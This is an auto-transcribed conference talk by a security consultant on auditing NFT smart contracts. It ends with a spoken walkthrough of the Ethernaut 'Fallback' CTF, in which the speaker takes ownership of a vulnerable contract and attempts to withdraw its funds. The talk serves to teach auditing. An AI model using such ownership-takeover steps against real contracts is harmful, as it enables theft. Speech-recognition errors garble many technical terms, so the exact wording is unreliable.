From Pixels to Profit: Mastering NFT Evaluation Strategies

[Music]

stra or whatever you say and that's and that was my tell in Bulgarian okay that's the end of my t in Bulgarian but yeah but I I don't know than for I mean for being here actually because I know that a lot of you are really tired at this point but so I'm going to try to make it simple and even short if if I can so but uh uh I'm going to talk we're going to talk about how to perform nft assessment and when I talk about how to perform nft assessment I'm actually talking about how to perform nft smart contract assessment because any everything comes down to work with a smart contract itself okay so that's why

my h called from Pizza to profit mastering nft evaluation strategies so who I am uh I work as a security consultant in at NCC group I part of the block practice we have a global bload practice in NCC group um I mean last but not least this is my batch about when it comes to blockchain security but ER to be honest I mean the the the actually I learn more about doing the assessment itself the what I learn from you know from getting the the certification so I came from Spain uh it was a a long trouble actually and just a disclaimer before we we start with the talk ER due to due to the LA of time and because we we can be

talking about and smart contract all day H I would try you know to to make it simple H to skip some explanations but but they are still in the ER you can find them in the slides and any credit credit is given and keep in mind very on this because even I can't perform nft assessment I know I by no means an expert in nftd it's like uh when a person a pentester can can perform an i API assessment but if probably that person but mightbe not be you know an expert on development and API so that's the case for me in this case Okay so this is our agenda for today we we are going to talk about

probably some of you are are really familiar with nft but we're we're going to talk about how what are they how do they work the common vulnerabilities we can find in a smart contract in nft a smart contract H we're going to introduce the OD methodology uh we're going to see some tools on nft in real life and we are going to if if the CH uh will allow us H we are going to interacting with nft smart contract and some conclusions at the end so let me introduce you Andrea pep the great blood chain educator who's going to tell you about what are what what nft are and what is the me and and

to get able to you know to understand what what are they it's better to compare nft but to cryptocurrencies because maybe more people are more familiar with cryptocurrencies that they are from you know from knowing where nft are so we can all we can split the main difference in three topics when we talk about ownership transactions and tradability when we talk about ownership H you can say I mean the holder ER cryptocurrencies is like holding money you know like the holder is entirely onet I mean a coin is it's onet by the holder okay but about uh what is the main different from nft the owner of the nft on onet with metadata I mean probably the owner of the nftd only

owns their metadata and the the I mean and everything that is related with the the non to the non funable token but it's sometimes happen that the intellectual property belongs to the original artist so why why so because when we talk about nft we talk about non funable tokens that represents an asset that actually exists we say the is a it could be a digital asset and even a physical asset okay uh when we talk about digital asset we call I mean we we can talk about they could be images they could be videos they could be whatever you uh I mean whatever you imag your imagination allows you you know to think about it so what about the transaction

coins are mined and on the contrary nft are can be minted and what is I mean what what meting means in in the nft words means converting a fight into a token so it's usable on a blockchain and how we do that that's why we use a Smart contract and that's why when per when performing an assess an nft assessment we perer that that ER that test ER using their their smart contracts even though it's not just about the smart contract itself we're going to see some other aspect that we need to take into account when performing an NFD assessment so um what about the tradability cryptocurrencies are fungal because one crypto equals another crypto but NFC I

mean One NFC it it it it might not be equals as another nft okay because nft are non funable that's why that's why the name the they are no equals that like another nft they're unique and they they represent a an asset a digital asset or a physical asset that's why we can say that they are unique it's like an artwork an artwor it won't be equals to another artwork so a a history about nfts uh we I mean it's fa enough to think that they they have been the the nft have been with us that long but on the contrary they almost have more than 10 years they've been around more than 10 years and the they started with color

coins that were a kind a a special special kind kind of coins that were unique because they H they have a metadata link We with with that H with that coin it wasn't just whatever uh I mean it wasn't just whatever coin it wasn't that Bitcoin it wasn't because one Bitcoin is equal to another Bitcoin but in this case because they were they have a they were linked to metadata that's why color coins were unique from one to to to another that's why we say that actually it was in 2013 when the NT came to life but we can I mean we can talk about two periods when talking about the the history of NST and those

periods are the pre ERC 721 standard and the postc 721 era why so because the standard the ERC 721 standard actually came to to to to you know it was created to set a guideline of how to nft should be created because if we if we promote and standard that any n smart cont NFC smart contract is are follow ER we actually can communicate smart contract one smart contract to another so this standard was made for for that that's why I mean that that's why it it changed it changed the game it was a game changer so how do they work we can actually talk about two sides okay uh to to to get to I mean to get to

understand H all the process of the nfts we we have the service side here and we have the user side here in the user side we have two roles or or even three roles and we have the nft owner that could be the Creator as well and be because sometimes the Creator is not even the the nft owner we're going to talk about that one later on and we have the nft buyer on the S side that nft owner or creator that could be the same person will submit I mean is the one that should the uh need to be may need to be sure that the metadata linked to an nftd is a is accurate enough I mean the cont

is the one that is in charge of checking if the token ID the day the Conta data is accurate ER before submitting that uh that data into the chain okay because when when it's signed and it's verified by the nft owner it will link that metadata or related to nft to a Smart contract and this is when the process of meeting it's begins okay H like we we said the process of meting is like is the creation of the smart contract of the of this nft smart contract and W within the blockchain okay this is when the the consensus is perform and if everything is correct this this smart contract is going to be on the Chain so

uh two two things import that are really important when it comes to nfts and the metadata we told about there sometimes it could be the the to the storage could be internal or external H it could be Eternal because we can uh we can actually have the nft or the metadata linked to the nft within the chain but it will be gas consuming it will be resources consuming that's why um generally speaking H people usually use exter storage to uh to to to save that metadata and then within the smart contract H there is a a UI a URL that represents when that metadata is a store and we are going to talk about what kind

of storage we have so when when it comes to uh to performing an nft assessment H we need to take into account some properties that NFC has uh and those properties are actually ER properties that are inherit from from this Tre topic I mean from uh we can split then those uh the properties provided by the smart contract itself because when talking about NFD we're talking about a smart contract H the ER the properties that are provided by the blockchain itself just for being in the BL in a blockchain we we talk about some properties that are link that that that nft is is going to take from them and of course because at the end of the day nft I create are

created by someone but by a person and sometimes they are maintained by a person but a a person as well and we talk about those those properties that human management provide so when talking about ER when getting to know this kind of property well getting to understand this kind of property we we it's when and when performing and and nft assessment is when we we said we canot ask also so what are the security concerns re regarding this kind of properties what about the the ER the N is owned by someone I mean n designate ownership by recording a blockchain address what happen if that address is is it change someone it's it's able to

change that address what happened so here this properties will gave us an idea of what what what should we ask uh even to the client to be able to to understand how they how they deplo or where they deploy their nft and what are the security concer for from this this kind of property so and that's why this is actually the security concerns that are linked to those properties and as I said is is one of the attribute of anft is that the an is owned by someone else what happen if that account is compromised and the asset is transferred by malicious actors so what happen if for example ER another one probably uh nft

are transferable as well what happened is the lack of smart Contra mechanis for the smart contract lack for mechanism for token restoration if we we are not able to restore the nft in in if an attack happens so we're going to lose lose that nftd so that's why this kind of uh of properties and questions ER are security concerns that we need to to you know we need to ask or we need to try the answer so what about the nft security risk in general because as I said it's about smart contracts of course that's why anything vulnerability related with a smart contract with actually will potentially impact an nft but because nfts we can use

Marketplace to sell all our nfts H that's why if we are using a third party Marketplace we have another attap VOR H added to the you know ER to the situation and that's why any Marketplace risk H for for example op open SE that is one of the well-known Market Marketplace for NFD was hack last year and it was there were millions of NFC compromis so that's why it's really important the marketplace that is uh that a client or a customer is using for their nfts and of course because at the end of the day ER nft are actually I mean we have the human the human factor here that's why anything related with soci engineering to Ste private Keys uh

will be another security risk and the root poles uh and what are the root Poes the root Poes are scam are those ER those kind of project that came to life and they went mainstream and everybody was put putting money in there was H trying to create nft trying to to sell uh or buy nft from there and then one day they disappear so that's uh and it happens a lot I mean even though ER I I I wouldn't put money in on an nft to be honest but ER but there are people that putting money in nft and they even use root PS that kind of marketplace that are scans that are well known that

uh that they don't know about their security so those are the main problems when it comes to nfds and what about when it comes to talk when it comes to the methodology that we uh when performing an nft assessment we take we need to take into account three aspect and those are the network the data management and the data storage and sorry about

that where where are we okay

here yeah it okay so I was talking about we need to take into account network data management and data storage so why the network because when a customer er uh ask us for uh for ER performing an an NFC assessment and they tell us that they are aren't following one of the well-known standard for non funable tokens that's actually an issue that first I mean the first issue you can find in in an F assessment because the best practice is to actually ER use one of these of the standard uh we the ERC 20 is just used for funable tokens ER for for for any coins for exle for cryptocurrencies and the ERC 721 is is

used H for nft in this case and there there is another one that can be used for both kind of token F funs and non Feld tokens so that's why it is important you know to to get to know to get to to to check if they are following the best practice regarding this kind of a standard and what about the data management why it is important in this case it is important because it is important it is important where we save the metadata of that NFD The Meta data it will be is actually the description of what about what uh what the nft is uh where is the asset the digital accet store or

where probably it says ER it contains I no ah a physical direct a physical address of where is the physical nft for example so that's why it is important to get to know where that metadata is stored because it is stored in in we're going to talk about what can be a store but if if a store in a third in in a third party this actually we we have another Vector attack here so that's why it's really important H what kind of contract they are using and where what what is the marketplace they are using and that's why uh you know to to even we have a we're going to see one tool that is it comes in handy whenever

doing performing an nft assessment that is a ler because we we can of kind of check if they are following they're if they're following the best practice for the standard that using so with this common we actually can can of check if they are following that and another thing to you know to to in this in this in this phas actually that we need to take into account if for example what what we actually do in an nft assessment is a code review that that's actually the main part of it's not the only uh thing that we do but is the main part of everything we prefer a core review that's why when we have some uh

some functions like safe trer from or safe mean and they are performing external CS to the receiver we actually can say at this point that that's not as I mean that that's not a recommended way to do it and that's why we can check we can check for reentrancy vulnerabilities and what it is what it is a reentrancy vulnerability it is when a smart contract can be called by another a smart contract before even actually complete their state when there is a process in the smart contract that they they need to complete they need to complete for example the the M process ER and they are called by another smart contract before get getting to complete that that process H

we we can talk about re-entrance is vulnerability and they even though they are really well known they are quite common you uh you will say that I mean even I I I can't tell tell you names but even big companies fall into that kind of vulnerability so what about the the data storage and why it is important because ER normally as as I say because this is H storing the nft when it the the chain it is gas consuming it is resource consuming in general generally speaking nft projects are always I mean play save the the the store the data as well and that's why H that's why we need to know what kind of of store method they

are using in order to to you know to to know if they're using a a good one a safe one and what kind of method they they're using for that so that's why uh as I say the smart Contra provides that un URL H for each token so what are the most common ways to store nftd we have software wallet like metamask for example we can have nft on metam mass we have uh the ipfs like pinata I'm going to show you one of my nft in in pinata that this is this is kind of a peer-to-peer system like like you can share data over there and it represent like a li a library okay and we can we always uh we have we

have as well col storage of how our wallet this is our kind I mean they are not that common in in big companies they are kind of of you know uh I really enjoy doing P doing performance assessment within the this kind of Hardware wallet so what about the tools for code review analysis because at the end of the day that's that's what we actually do we do we perform a code review H so this this is a list uh there are not all the tools that we have we can use but this is a a a really good uh list of the tools that we normally use when performing a an assessment an F

assessment but ER May with me on this because uh I mean uh recommendation uh wise in this case whenever you ask the client share with you on a smart contract they share with you ER which kind of uh which kind of framework they use for the for develop that smart contract and they should share with you the the the unit test as well so the better way to to perform an assessment in in this kind of smart contract it's to use er a I mean to to test a smart contract locally why because ER if you use Foundry for example that it is a a a development framework H you can use a local node uh like with Anvil

that you you you are not going to need a currency you are not going to need coins you are not going to need ether or whatever coins that you you should probably need ER you know to to to interact into the an nft of course if the I mean the the the best scenario is that the customer actually gives you access to their test H their test environment but actually that that doesn't happen a lot unfortunately so when this is a good list because uh I mean you can ask yourself okay but if this is a code review and we are talking about that for example most of the smart contracts are made on SOL solidity so what are the

witnesses of of those smart contracts these people ER those that Wen in charge of of this project ER list a a very detailed ER list of smart contract W Witnesses classification so they are not longer uh uh updated ER they even tell you uh where do you should get the the the the latest of dat of this kind of of you know of data of information but still they have a really good uh list of witnesses uh related with the smart contract and this one here sorry this one here is actually as where it gives you an idea the the security check you can perer ER doing uh when doing a Cod review of an smart

contract so here we have the nft in real life this is my nft you can even ER buy if you want ER that that would be funny for me actually or you can try to to to uh to to steal my nft as well that could be so we're going to see this nft in real life let me so this is the NF on openc and on the deset the testet is one of their their uh test platform okay and here what is interesting about this nft uh what is interesting about this you know uh that it is represented here in in in openc is that we can get to know where is a store the

metadata of this nft and uh that's why that's why H H uh I was talking to you about that the metadata could be within the the chain but it will be consum a lot of gas and that's why I actually use a ipfs okay which is his pinata H to you know to store the the metadata related to to that to that NFD and what the metadata actually has the metadata includes the description and what is that Image store so and where is that Image store that image is actually in pinata which is the the the the platform that you can use you know to store to store metadata related with digital access so this is where it is a store

and what is another interesting thing about about you know get just you know get to the searching some nfts in this kind of platform is because you have the contract address and you have the contract address the nft smart contract of this NF link to the nft to my photo so that's why and you can see because I mean blockchain is actually something that you can ER you can check and you can see all this history of the transaction that have been performed you can actually because I I decided that way you can actually ER see the code the source code of this smart contract for this NFD that's why uh I was telling you that you

can actually try to perform an an attack and be uh you know to to get to to to to be able to to actually steal my nft if you or you can the better way to do it is to buy my nfg as well other the mine so the the good part of of this kind of platforms the interesting part of this kind of platform is that when H someone share because you you can actually share the the code or you you can't decode it so uh when someone share the code you can actually see what are the functions that this smart contract uh that you can call from this smart contract and that's why uh you can

actually I know you can test this kind of of platform just to be you know just to get to know ER what the code does and what are the functions that I can I can call and even you know uh perform some input input validation just in case something something was made wrong so this why this is why we have here the we have another Tools H ER I I was ch ch I just want to share with you that we actually have an NF in real life this is the the smart contract is deployed on polygon scan H it could be explo deployed on ethereum but uh I I try I mean I just choose this one because uh I

use fake fake coin as well ER but here you have uh I'm going to share I'm going to share you're going to share the the presentations later on right I'm going to share with you this presentation because here you have some CTF that are really you know that that comes handy whenever you want you know to understand how smart contrast work so there here you have eal open seink that this one is really I mean it's quite interesting and of course we have the dam vulnerable vulnerable de as well so and whenever performing an nft assessment what we actually the the final result of this of this process is actually a report for the customer okay and that's why and

sometimes H when you are getting started with nft you kind I you probably have will have a hard time getting you know getting to identify what kind of ER of issues or findings we can we can find this kind of assessment so that's why I sh with you some all these example some some reports that were published were made published for open from open saing H that you know will give you an idea of how um a a report of a smart contract will looks like so uh because I don't know how oh we we have time ER we're going to try to interact with nft this is actually a a really I mean I keep it

simple because I I I gave you all these details actually for you to be able to to try to you know to to set out ER even to deploy anft yourself self using of course F fake coins you know Ma maic that it is a you can use a fake coin or under Mumbai fet that it is actually a a platform that you can use for test your for test testing purposes so er that's why I gave you this kind of data that you can use uh to try to deploy an NFC yourself but we are going to see what about the C I mean uh we're going to try to interact with a smart

contract using try to to use it what it is happening with this fback function okay so we have e now that that's what that that was one of the platform that I Shar with you that they have a really interesting CTF so we're going to this is actually a challenge that we need to to perform in order to uh what are the main in order to to be able to steal this smart contract and be able to withdraw their their funds okay so I'm going to I'm going to sit I'm going to try to to to to open a new instance and they will ask that's why I I have metamask I don't know if you are aware

if you are familiar with metamask metam is a wallet and I have I actually have just F fake coin okay ER but I have the POA e that is a fake coin and they to in order to get a new instance they will they will ask you for you know to to do the transaction because it will you will need S gas to perform so H let's see if we can get this is the when getting a new instance this is the the contract address when we get that new instance so this is the contract address that we're going to use in this in this example so remit I'm using remit because uh everything that I don't know why it's it

doesn't look you you able to see it well more or less so ER because ER remit in in the slide uh I I put some information about rage but this is actually a testing a testing development ER tool so we're going to use remits uh what we're going to do is this is the Smart contract this is the the smart contract from from here okay this is the code we're using from this smart contract so H um in order to test it using remit it is a test a tested uh a test tool we need to compile that smart contract and in order to compile that smart contract we need to you know this gonna be this could be

h a an issue if the if a actually a customer share with us this kind of a smart contract and they are using a solidity that it's all enough this is actually an issue okay this is actually a finding because this this is the kind of things that we we need to check within the the code so we we need to we need to deploy we need to use the compiler the same compiler and we need to deploy this smart contract it should be deploy here and er in order in order to you know to to get to know or to understand what the smart contract is doing ER this is actually I mean the challenge it's

called fallback and why it's called fback because a fback function is is is a best practice when you want your smart contract ER to receive e ER from another smart contract but you can do it in a safe way or you can do it in the worst ways possible that that uh I'm going to show you that this is actually the worst uh way possible because ER you can do it in a simple way or you can actually ER add in the fback function in the in the fback function functions that allows you to change the owner of a smart contract and that's why what we are going to try to do I mean if the owner of this smart contract is

actually this contract address okay is where the the instance uh we we deploy the the new instance okay so that's why H when we're performing a a a test within a smart contract within damage we need to to make sure that we are using the same wallet that we are using in this case is metamask H this is actually my account this is actually my account from metam Mas you can see it here is a bit it's slow but uh trust me it is my account so here you can see it okay here so what we're going to do if we need to understand Where What Where in the code they are calling owner or where in the code

they're actually trying to you know to to change the owner of of an of this smart contract and we have a lot of a lot of function here but mainly they are actually a trying you know to to change the owner in two functions contribute is where we see that the owner is change and in receive is where which we see the owner change so I'm going to I'm going to try to to deploy this smart contract in this address it will it will ask for gas that's why I I saying that Er When you know when they were testing this kind of environment which should have fake fake uh fake money so and you can

see when this nft this smart contract is deplo you can see here that we have here actually the functions that are being called or that are included in the in the is the Smart contract in the call okay so but if you see a if if you we have the con the the the contribute we have the fun the contribute function we have the get contri contribute we have the get contribution as well we have the withdraw but what is the receip can we call the receip from H I mean uh from within the the remit we we can call the receip and what is h what is happening whenever we don't have a way to call a a function or to call a

class we can use in remit we can use this call data this TR transer that it will be calling whatever function or whatever uh class that it is in containing within the the the function that we should be able to to to call so uh what we are going to do yeah it's calling uh what we're going to do is try you know ER what it's it's saying this this function that we are going to try to call from outside using this ER this call data this is actually is saying is is saying something like okay in order to to be the owner h of this of this smart contract you should have you should have

given us a contribution and you should somehow a ER in in the past ER having a I mean ER you should have interact with this smart contract and that's why that's what we're going to do we contribute because we can have we can call contribute from outside I mean from from from within the functions we can when remit um we're going to try to send some way this is another kind of f i mean it could be F but we're going to use way this is another uh kind of fake ER coin and we're going to call the contribute and we we need to config the transaction let's see it it is worth uh transaction about

pending it says okay trans confere let's see this is uh this is actually the problem with the the live demo uh but we get into there let's see if we can actually contribute because if we are able to contribute ER with money we are able to match one of the ER one of the consideration that the receive H function has okay so let's see if it change in some part this balance should be changed for whatever way we we we were sending okay but trust me oh let's see another let's perer another amount

oh okay see it changed okay so we get uh we were able to contri to contribute some money so in that case and we were able in the past to actually interact with this smart contract so in that case we should be able to be the new owner of this smart contract so whenever he wants to send the money we should be able to to be the owners so but anyway whenever if once uh we we were able to send some money to contribute some money we were able to match one one of the conditions from the receive ER the the from the receive uh function and in this case it should it should happen that we ER let's

see what is this address it's mine is the is my address from metam Mas let's see so that's why I'm the you owner of this smart cont and the last but not less important important condition H it was or the main goal for from this example was you know to get to withdraw this amount of F and to get to withdraw this amount of f with get estimation fail of course we will fail but we try again and because we don't have actually a we we are you know getting we are using the fback function which is King a function that doesn't exist or using some money that that as that it isn't expecting that

we kind of steal or we are going to try to steal or to withdraw this amount of money let's see it it leted me to withdraw the balance of the funds that this smart contract have if not you you can trust me you can try but uh but we were able to you know to to contribute to uh with some uh money we were able to to be the new owner of this h of this smart contract and the last but not least that we should be able to do whenever this want to you know to work is to be able to actually ER withraw that amount of money from from the smart contract but what for whatever reason it isn't

working right now but trust me I mean you can you can actually do it so getting back to the to our

presentation I went so uh that's why you will actually have H this this uh CTF fileb here and you will have as well the smart contract deploy in Remis contract so you can try whenever you want because yeah it is actually a smart way you know to to to get to know or to get to interact with nft as well so some of the conclusion that uh from from this presentation actually I mean the the big problem with nft apart from being h a scam okay AP for being that that they they could be an scam but you will be I mean you will be impressive H for the amount of companies that actually H are

using NF and they are as they are looking for people that are able to actually perform assessment of fnts ER so ER because nft are at the end of the day are actually smart nft a smart contract whenever uh whatever vulnerability is linked with a smart contract will affect with will potentially affect or impact nft as well and of course social engineering as well so H that's why uh that's why smart contract Auditors are crucial in in say in say wording nft that's why a even though the nft went down last year oh they use n went out last year there are a lot of company that are still using nfts ER for games for example NBA for

temple so they're actually looking for people that you know that are able to perform this kind of assessment so last but not least many thanks for having me um you know for for accepting my my proposal and and just I I I want to give a bit Applause and everything in charge of the organization of this Heaven because without you we won't be here so please any question give an Applause to [Applause] everyone thank you to and thank you PR the